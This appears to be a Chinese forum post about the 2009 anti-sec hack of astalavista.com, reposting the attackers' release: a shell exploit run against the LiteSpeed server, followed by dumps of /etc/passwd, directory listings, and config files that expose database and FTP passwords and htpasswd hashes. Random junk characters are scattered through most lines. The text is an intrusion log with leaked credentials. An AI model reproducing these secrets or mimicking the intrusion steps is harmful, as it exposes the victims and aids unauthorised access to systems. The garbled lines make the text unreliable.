里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。2 c/ c' }; \0 p* U% N1 V
( R( C* ~ Q- j' [[root@front3 ~]# curl -I litespeedtech.com
3 O1 B# ]; a, q d7 r4 K, t8 oHTTP/1.1 200 OK
* c0 m5 ?+ N! f. ^+ x9 zDate: Fri, 05 Jun 2009 22:54:51 GMT
X' x5 n/ N; o4 [9 R/ D2 p1 k' j+ X6 qServer: LiteSpeed! X% B) h1 }9 A7 i" h
5 [+ t& M! d) l* o
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_- w) D' t3 K& }" N; j1 |6 c' r
9 Q5 ^# L, O1 R& Y$ x有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
! R9 h( _, \0 C' Z* P* C
. e+ K! d0 Z( A) x" m) D; S( Z5 M: E0 e0 W5 M7 n" I
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ + S# f* h4 M% E: T( d( q c
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \9 c( b8 |, X8 v9 ~6 X% y/ B3 M
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \7 F7 R& ], \& T |6 ^! r3 @
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
! x3 g9 e, i' C5 h) L3 _) v4 a \/ \/ \/ \/ \/ \/ \/" Z# y8 J0 A7 z# i
The Hacking & Security Community0 x1 o& i1 |% s$ k7 U# v4 T
[+] Founded in 1997 by a hacker computer enthusiast
" Y. v/ G, S" v5 O2 ~% {[-] Exposed in 2009 by anti-sec group
+ Y G" }/ z& g! l. P$ r+ m' |! J$ e) t
, g! |4 D( S4 k [; e& z1 aFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
( U% u; K- W+ T. ?! b5 m) T2 o>> 03. Who’s behind the site?4 O7 Q0 l9 n2 ]
>>
z9 l( e/ s, I3 u2 N Z4 _* n>> A team of security and IT professionals, and a countless number of contributors from all over the world.
" Y* [+ d/ h5 @% X: V* l# t0 \ p3 \2 t
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?, E; S! B- X5 \2 Y( [$ P5 m
>>
6 s: Z& }3 R V+ {>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
' i9 T' L9 c+ X2 p% emilitary institutions.
$ u+ `' h- _0 I! Y' l. B" D. m>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
6 _; o6 t0 o9 L2 }0 B5 Z0 Q9 S7 {% V L' R! X6 w
Why has Astalavista been targeted?
4 u- Y: ~. R/ [0 B' q( G% D5 F4 Q5 {( ~0 F4 e% b/ [/ v: ] ]* B! F
Other than the fact that they are not doing any of this for the “community” but6 a7 S6 n( _% R1 p) x2 L
for the money, they spread exploits for kids, claim to be a security community9 i; d7 Y: A9 j; u
(with no real sense of security on their own servers), and they charge you $6.66
9 u7 @5 D" B" ~( i1 R5 _0 _3 zper months to access a dead forum with a directory filled with public releases
6 h* v1 ~0 `+ d. vand outdated / broken services. c6 _9 r7 I4 k2 Y* D% j
, V5 m/ l) e" {1 M- D5 C: UWe wanted to see how good that “team of security and IT professionals” really is.
2 }* W. S& Q7 t2 N' p
# O1 l8 W4 l) @- a+ B; ILet’s begin.
3 ? b7 }; U7 t( o/ S. B3 L) N# C- Z# V
anti-sec:~# ./g0tshell astalavista.com -p 80
K9 U, q6 ]0 r5 a[+] Connecting to astalavista.com:80
8 [' V/ D/ j% s1 X( Q; Q[+] Grabbing banner…4 x d6 W- V' K* l. \0 m1 ~ z1 C
LiteSpeed+ e# @! K7 O0 J, H, U. Y' i
[+] Injecting shellcode…, y$ i/ A9 x; F# U ^7 {
[-] Wait for it
2 H, Z% g6 z! c. t7 w( ^! y. \; P: D! q6 y& f
[~] We g0tshell
; h6 O+ r5 }+ F' }# q i8 [/ huname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
* X" N9 o6 k& X) f' BID: uid=100(apache) gid=500(apache) groups=500(apache) w) P) _! [5 }/ o7 ^1 K
2 F$ d1 `7 T" E5 ]; c. A- h/ Nsh-3.2$ cat /etc/passwd8 {+ @- R2 m) h$ @. J& H, g
root:x:0:0:root:/root:/bin/bash
3 E! H, f; b( r& {/ {" Sbin:x:1:1:bin:/bin:/sbin/nologin- U. q% B% Q# Y& @
daemon:x:2:2:daemon:/sbin:/sbin/nologin
, y, k% `" N2 K# C# Q8 q5 \2 ]" |adm:x:3:4:adm:/var/adm:/sbin/nologin" ~. ^0 w* a% Y8 [
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
; p8 O* A4 {( C* j0 v) _sync:x:5:0:sync:/sbin:/bin/sync
& b( a# d6 e+ [; N( ishutdown:x:6:0:shutdown:/sbin:/sbin/shutdown3 J& u' W* W0 b! z% x
halt:x:7:0:halt:/sbin:/sbin/halt7 @$ Z# `* v4 Q4 S
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- m7 f$ B% i1 f. `* K" Q, d; T1 Znews:x:9:13:news:/etc/news:$ f& L6 i/ \2 s/ M1 g; {
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- l8 J) E) h f# C. a, g* Z' {. @9 \operator:x:11:0 perator:/root:/sbin/nologin
6 V; A# ~5 M/ Mgames:x:12:100:games:/usr/games:/sbin/nologin* j' `2 m; G1 f
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
( h* }) X9 B9 B+ `2 n" mftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
% }' Q7 B- g, \nobody:x:99:99:Nobody:/:/sbin/nologin7 a. g% {0 h9 E3 X7 n' D
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
: b+ r5 i5 e u' {dbus:x:81:81:System message bus:/:/sbin/nologin% f2 H. ^7 N5 T$ f# s
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin5 K1 i0 o! Q7 z3 ?# {& F
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin8 M: j, I2 m% W1 y. B4 ]
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
" o6 B, t/ u% v/ uvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin. O, s6 p1 j9 Z; A6 l
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
' n% u8 g0 f+ m Krpc:x:32:32 ortmapper RPC user:/:/sbin/nologin: J0 t! Z8 ?6 L' R7 K/ @; K
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin5 Q- v: O: o/ x
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
5 Z+ _! p7 |* q. V! s0 K$ E/ ^+ ]sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
/ J) V0 s+ b" n% `7 N) E0 Dpcap:x:77:77::/var/arpwatch:/sbin/nologin4 R, z7 l" a& x2 h Q7 i& N, {
named:x:25:25:Named:/var/named:/sbin/nologin; J, ]. J' R& b' e* l5 M" R/ Z
apache:x:100:500::/var/www:/bin/false$ w3 H% \9 K7 T) M9 K g
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
7 ?# a2 L7 f! o; r" Wmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
6 M/ b& l B3 hwebapps:x:500:501::/var/www/html:/bin/bash
3 T4 M3 j0 K0 w6 a( xmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash! }5 Y; R6 B1 R, O
admin:x:501:502::/home/admin:/bin/bash! {. M" T4 e" D4 g* Z# q) K: f
jon:x:502:503::/home/jon:/bin/bash) ~. U a4 M3 L7 `" [
com:x:503:504::/home/com:/bin/bash
6 ^2 q- l* \* J/ U+ ^+ _+ Y2 U0 ^ntp:x:38:38::/etc/ntp:/sbin/nologin
7 R! A' B+ ]; k2 o7 nais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
, P7 I, Y4 Q# T& l0 W; Y8 c, Rastanet:x:504:505::/home/astanet:/bin/bash
( w3 t" v% a5 w/ C# P* J/ Ravahi:x:70:70:Avahi daemon:/:/sbin/nologin6 `5 @4 S* x. _% e: B4 E& Z
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
3 t# ?0 @/ m, P- L' {( _( ]8 e
2 d5 b0 V0 ?" B/ w5 x* \sh-3.2$ cat /etc/hosts1 q. @8 a* R+ v/ a$ K
# Do not remove the following line, or various programs
9 I; J$ f u* k4 E1 g4 _2 [3 Y# that require network functionality will fail.. _, S6 \4 V d% L9 h+ [+ B
127.0.0.1 localhost.localdomain localhost7 a2 o9 s1 s5 j W1 N1 V0 l6 V: z" J
::1 localhost6.localdomain6 localhost6. ^; q2 ^; _/ a& m3 b7 |
80.74.154.172 asta1.astalavistaserver.com0 Y$ d8 K# `/ F* c P4 b/ m# C
}1 L, ]; h' p( E
sh-3.2$ pwd) Q7 O. D3 W0 u0 ?
/home/com/public_html# d+ S: @$ K9 O
5 H- G) J3 z6 t! ?- K
sh-3.2$ ls -la
6 r6 v m. q7 atotal 18460
7 x; N0 G2 }: m4 odrwxr-xr-x 30 com apache 4096 May 28 17:06 .
4 F, N+ l9 Y# t# g- U9 Fdrwx–x–x 11 com com 4096 Jun 25 2008 ..
2 L( D* u1 O+ L7 N9 b4 s$ Udrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
" D. ~! S1 B& k5 ]- U6 Xdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
, |, j c' ^* R2 ddrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
5 i" `2 C) d& p) r" R1 Zdrwxrwxrwx 2 com com 4096 May 19 00:50 config8 q+ D- |' n0 [* X: C
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core1 X$ |' B' {8 M( m5 C; M9 Z
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules- G" {3 y$ v9 Q% e! O- `4 L
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
# r) M) |- b4 F8 N: e% _4 F, adrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
& t3 `: s! U9 W, m5 a$ X7 Z% rdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__2 l" ~" C z- C
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
4 {7 z/ y5 Y5 H; Bdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
7 d( E9 }6 Z# U5 A$ ldrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
; M+ l6 Z) q/ a7 V) R-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
# c, Y/ d, L9 Q' ~. L `, Fdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed3 q% Z4 E& @! E5 R
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess. f+ ^6 u% m# w% `
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
! O2 t9 r. O# d( Y) @-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
* a! ?' s* ~0 M8 K4 b3 idrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
% \* u& L# C! ldrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
: `& l7 @( H8 D2 d-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
( m1 S' C$ u2 Xdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
- n, n0 q# S( r9 c" h3 t7 ~drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
! H( o% Q4 g, [' m' s# ]! Ndrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib: b9 |7 k& ]" |( P* k% ^
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media6 j0 B# n! G( g/ H' `2 N+ b
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications9 u7 j4 V2 w1 Y7 f! b* l
drwxr-xr-x 34 com com 4096 May 28 16:30 modules" R+ j5 f: k9 x9 k
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
7 ?. t3 x6 e. O6 w9 H6 q" u" Q" qdrwxrwxr-x 22 com com 4096 May 28 17:06 _new
: S$ \ ]4 k% R7 ~* I+ J+ q0 A8 F) e% Ydrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
2 [6 L- E& [/ tdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy) V+ [' K, G0 a- _5 k# J
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy0 U% d: s; h; G0 d* l
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
0 v8 x( F8 {% A/ a-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml/ m/ z7 X7 X" e8 t7 w6 {" F
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
' w! S* U ?. r5 @drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes& L4 d9 X+ j3 a% e1 X/ v8 ]
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
2 T% g- d! `1 \- [1 _' Edrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam+ G+ `+ @; b4 a$ ]6 Q. c# Q
7 O# D7 C+ C: \5 M8 g! _* k4 E) h
sh-3.2$ head -20 index.php
/ l. q$ i5 ]3 B. ^3 o8 c3 a<?php
* m3 _/ |4 p' h. O4 y. T! n6 _' c4 W2 [- e: j
/**! w/ i5 A. M$ r s: |. N
* The main page for the CMS; j' e' q: I9 N* t
* @copyright CONTREXX CMS - COMVATION AG
7 `1 J. v* j; }4 m$ t* @author Comvation Development Team+ ?! S/ r Y6 x7 S
* @version v1.0.9.10.1 stable
% {+ a) J( y. u2 ]* @package contrexx% g& o1 L. `4 w' m( S) U
* @subpackage core) g9 `: C" Z3 g6 z4 @6 i2 b
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
4 M7 \3 Z8 v: X/ x* @since v0.0.0.0! d* ]5 K7 W. E. i E+ [
* @todo Capitalize all class names in project
, ] f; P) Z. G$ H$ G* @uses /config/configuration.php
( t1 E) D4 g2 Q* @uses /config/settings.php( i) S" I P+ W- v w8 P
* @uses /config/version.php
# n( ~1 _: a8 M* p7 y9 @) v; ]: U9 W* @uses /core/API.php% x( v1 o+ ?# w# S
* @uses /core_modules/cache/index.class.php o: v1 N6 K+ O1 f) j7 l. O
* @uses /core/error.class.php ?+ ~! R2 p) }3 q2 B/ f8 \, f/ P
* @uses /core_modules/banner/index.class.php
! w" z% C+ @0 |* T* @uses /core_modules/contact/index.class.php7 H5 F# b5 O% n5 Q$ a) Z0 p& w
K( z8 e. u3 Q& `5 jsh-3.2$ cd config/1 T$ ~& B; Z2 V8 Q( V, U8 f' y; `
sh-3.2$ ls -la4 g+ s2 V( k, ^8 U
total 32
, h& m# f' `/ g0 Gdrwxrwxrwx 2 com com 4096 May 19 00:50 .
5 N( q+ w. w% d7 L, r2 _" Q Pdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..7 [; \, M9 w8 V' x
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
2 a2 @9 X8 E; Z; _0 i% z' M-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
& {+ h. _0 `) A/ D" H" A-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
% U, J$ @! C; r-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
: ]5 x9 T8 T& Q* f9 X5 M; P9 c
6 x* ]/ ^' {; p4 A9 d* d, @sh-3.2$ cat configuration.php+ e9 i( W" P7 O' l* m* h
[snip]& M+ ?' {! [6 ]" W# D
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost3 A- G6 G) c" I% T J8 z2 T# c5 ^
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
. u J; o* K6 L$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
+ @% Q- h1 y& I \' J6 j$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username5 | ^) I" R8 @. r9 E7 ^3 d
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
% G: Y8 @# O5 ?6 b/ e: i, p$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
) N& W$ [; y8 H' y I8 S$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
5 ]4 E# d" Y3 U+ y( z# O7 m[snip]% y- r& v: j0 B) m
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false3 x0 H) ]$ k, ^. n
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
' y2 w1 d7 b1 n1 x; _$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
/ S" U/ S: Y! c/ u$ A3 A$_FTPCONFIG['port'] = 21; // Ftp remote port
4 ]" M$ n3 j; i# m0 D) X$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username0 |1 B" n8 Q+ o! I
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password3 I5 l; j' T$ t; K6 ^
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
3 w" _% j" G( G* n7 R H" e, M, z+ L. P+ D" z, n6 Y, P6 i
sh-3.2$ cd .." _- O# l. V5 w8 C) z
sh-3.2$ cd dvd/2 B8 y, z& W) h
sh-3.2$ ls -la
3 e) _( o0 b8 M, f4 X/ a# k) Ototal 2913780
/ Y/ q5 O. v2 b/ p, Q% b" Qdrwxr-xr-x 2 com com 4096 Sep 9 2008 .. U: K3 K, X5 G- d1 _5 Q2 ^# S
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..1 Z# [4 E h4 k
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar5 E; Z" ?! O6 C3 M
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar3 y& e* h+ f8 B# n0 q1 F1 H- \
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar+ E& S4 n% j" @0 \" Q
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess' e( { T1 t6 L
% `) e3 t' P. Q, J+ _( ^9 K" Osh-3.2$ cat .htaccess
9 v5 }+ E5 y4 i7 B" J \authType Basic1 X, D7 Y3 d! Y v% A0 J
authName DVD$ X! \! @5 a3 x9 A
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd- L% C0 Y. o4 t- k/ T/ i, u. _$ P
require valid-user
# p7 o8 Y) v) d" B* G. J6 a* X
! @: N+ H; \: }( qsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd& n1 x( J! |; Z) M7 d
DVDdownload:CRD8cuY6.MPT6; T3 Q: }9 b$ j. w. |# j
DVDdownload2:CR8a36.wluFMg
9 W3 Z" t" ~9 F3 ^; V, _# }* W8 G$ x- `7 l+ ?
sh-3.2$ cat test.php0 S' Z7 G4 \" ?, ]( ]' `
<?php, S; I" ]3 d) I
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
; c" S( ]3 Q! m$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));0 m/ \; X4 B( q& q; P
echo $url;
" e# A7 V! b* k( j7 `0 U; P, b?>
6 f% @* {& y# f% @) E6 m) Y% s; l9 L& H, H5 w4 e" w, c2 P
sh-3.2$ cd modifications/
4 H' k# ]$ v. H5 J a( F! ^+ {sh-3.2$ ls -la x- t; b+ i6 Y' r
total 32
+ n9 O* q; C5 j) Zdrwxr-xr-x 8 com com 4096 May 11 12:48 .
/ w J9 x2 E! a& W! X& ~$ ]4 ldrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
' \ z2 C6 }) M3 C1 a& adrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
! B# [* d9 \$ f) c1 F! Xdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
1 R/ W) I1 l |& Odrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
& p+ B# V" d. P1 pdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc; C- T# f6 U1 ?' Z% I
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
8 [& |. R) F1 x; p5 Z- sdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
! ^5 W6 ]& O% s, d& _9 _" b% a) l3 N) \. Y
sh-3.2$ ls -R; G- o! l$ p; W+ G
.:
8 Q+ v( w% Z$ \" Xcom_avtng cronjobs onlinetools pjirc search _tmp0 i. i; S) U8 H) H4 ?0 K) `
* B' C/ l+ m$ |7 r# d! g
./com_avtng:
$ h* ?7 t$ p; C5 x. Y! ~( Cavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
* d# g4 p; D/ w. c" R; r, u$ l* _
./com_avtng/scripts:8 D$ Z& i6 u; g+ ?" H3 a. J
popunder.js% g. B3 ~$ u; W4 K8 M4 G- b
b( j1 T9 }8 z* H" C./cronjobs:
3 P9 d( W @; dexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp* D3 a* _; ~2 ]* x
# h) Q1 g* g6 J/ H, s./cronjobs/tmp:) x7 L* d' r2 T* @
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
3 @2 x, U1 ~" l1 l) S0 s
# r; |) j# U' l. z/ }./onlinetools:+ V/ b j u2 x1 q
index.php# S% A6 N$ H7 K6 M" f( C8 @
/ A9 X! f5 D, K; w! u1 ?./pjirc:1 o! m' o9 E& t- n1 L8 S
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
) x' I4 N v. I4 B: sAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
2 ?! d2 A/ b# H/ C" ybackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd+ D7 E$ N, d( v1 E9 v% V. S3 m
8 f8 ^) [$ J/ B: Y& e5 ~ ?
./pjirc/img:# g( @: W, M2 {6 K" O( M. N2 }
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
# _' F3 [4 W& k L: v( C* karbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
( R1 N# t$ f) J2 E+ Averre-eau.gif
* I2 R1 L% _) e. qargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif U8 ^. G! V+ y8 \% |) r9 [
verre-vin.gif
" J, {) {# T5 g6 oballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif1 U6 u7 J/ i' }
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif& I5 D/ K+ S, g1 ?& ? i
" X: s& L5 C2 s6 G8 O1 X2 ~, l
./pjirc/snd:
3 J8 i6 e( I9 V7 F- ~( cbell2.au ding.au, E$ q, O7 O$ o: H) U. _7 u4 u
' ?" k J# y. S- s4 z8 p2 d8 L./search:* n' W1 C9 U: z. U6 T z: o( t" M( @
searchEngines.php search.php' Y8 N! `* @9 P b
, }; C1 Z5 E& U7 B4 Q
./_tmp:
9 p9 ]: `- j+ L7 R2 p. J$ gdefaultPorts.php defaultPorts.txt
! T7 O: {: |" m+ x; P
4 O0 r5 c+ V; K( S' u- ^sh-3.2$ cd cronjobs/
& _. n" l; S: h* l3 e6 Esh-3.2$ cat exploits.php
( T- c( V: T2 Y5 x6 `, `6 W[snip]! A# \3 A, P$ v- ]0 u* P
$categories = array();0 Z `6 L& }9 L5 `. t
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
( i/ e) r8 s6 e* d9 X ~* q$expolits = file($milw0rmFile);: n3 Z/ v s& F# Y/ [
$comExploits = array();
& }( Z2 p, E7 z, t[snip]
6 H+ t; g( p( E& u- a// manage data2 Q7 p# e: u* l) h' U
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26404 O1 i, D6 Z8 I" d& \9 [
$ j s) J- d( v; R
// get path and title
' I3 ]# C# w: P $expolits[$x] = trim($expolits[$x]);5 Z9 S! i3 o# W# H' c3 _- k% i
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
6 ~" m0 I: n r! f! v9 ]- I $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);1 u* T! X8 D0 | p
/ ?& {, Y( M( t8 D: n* k // check if file exists
% b2 q. I A4 R0 @ M6 [ if (file_exists($path)) {4 v) I- v2 | V; Q8 @! [7 |: s
/ k; h! ^+ p+ F- z $text = file_get_contents($path);
1 e7 ~+ b( p: J- J2 ?
5 J1 A' W& Z% ^ // get content and date9 i, V! l& W% t9 Z- v0 |' K2 U
//$text = htmlspecialchars($text, ENT_QUOTES);
, h. E9 L, w/ q0 C6 e# _ $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));: v/ O/ R% ^0 R) Q/ }
if ($tmptext != ”) {- s( r8 C& {- h. n( A3 Y8 g
$text = $tmptext;
/ h' \6 Q) G4 d: c, L* c0 B } else {% y# i {6 M8 G I+ [
$text = addslashes(htmlentities($text, ENT_QUOTES));! b$ F4 M( e' }+ @
}
8 I/ I6 W& \" f+ f $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));! l# y' v# W( Y
$tmp = explode('-', $date);. t! Z' s' J# \2 ?+ l; N
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
- t% P" |3 ^4 ~8 |% c $cat = getCategory ($path);
" y, p$ v# j! t $ext = pathinfo(basename($path));3 \* {8 D# d# ^
$ext = $ext['extension'];
4 _4 |& U' Q( ?1 a! v0 n $qStr = ”2 e+ |5 \( Y6 V# D/ Q
SELECT `id`
& j! w& ?+ L2 G FROM `contrexx_module_exploits`2 x+ K3 b$ v# \0 y+ c# o
WHERE `title` = ‘” . $title . “‘& ~' U4 ]) T5 U0 S8 w& `
AND `date` = ‘” . $date . “‘
! L1 r6 o! `$ _* b “;
) _9 X. [4 s7 P1 T- [ echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;8 a1 A! B+ m; W
$q = $_objDB->query($qStr);( [) F( z o' T5 g/ K
; i0 f. ~! v+ L; @* {; d
if ($q->numRows() == 0) {
% i8 X1 S' X, v( {" z$ s, L; _
+ }( Y9 q8 w! R _/ D // prepare array& L! Y0 {) v2 E) M/ v' s) c
$comExploits[$x]['date'] = $date;
! z' k8 F6 M9 p3 ` $comExploits[$x]['title'] = $title;4 b4 h$ h9 e) ?! F8 Y# o; \# T5 U2 Q- H
$comExploits[$x]['author'] = ‘milw0rm’;1 r3 a9 ^ L9 V- j# z, T3 ^
$comExploits[$x]['text'] = $text;
. h" M: m: H% K8 E) m% m $comExploits[$x]['source'] = $ext;5 I7 [3 `, ~! n1 h1 W
$comExploits[$x]['url1'] = ”;
/ j' S, L& e/ }2 L( U) W $comExploits[$x]['url2'] = ”;
; X4 C7 b5 Y6 T' Y9 K $comExploits[$x]['catid'] = $cat;
5 ?: B' N' h6 F% p2 [; w $comExploits[$x]['lang'] = ‘2′;& I5 o9 Y7 ?( {
$comExploits[$x]['userid'] = ‘12′;
& h3 K& S2 Q/ C6 ?2 E, y) [% A $comExploits[$x]['startdate'] = ‘0000-00-00′;
# z) d8 i8 }1 k. E( \7 P8 L' r $comExploits[$x]['enddate'] = ‘0000-00-00′;
. @/ y+ x: z; l6 J( M I $comExploits[$x]['status'] = ‘1′;
6 c- f. M4 I9 N, m. R' h* Y $comExploits[$x]['changelog'] = $date;
* f+ A \; `% a' P/ f
/ f+ S/ J& B, c( x+ N$ ^ }
# Z2 z6 R& V8 |4 l+ T+ g[snip]# |# p ^3 e' v3 @5 k
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>& f/ f3 T0 N; B$ k' s; E1 f
<rss version=”2.0″>
3 D) b5 T; ?* d5 D9 d6 { <channel>4 I a( j S6 l" P9 Q" h- ~7 h1 _
<title>ASTALAVISTA.com - Exploits</title>
6 D& J- _6 V( O <link>http://www.astalavista.com/exploits</link>/ _6 I1 `: g9 M: U" H) `
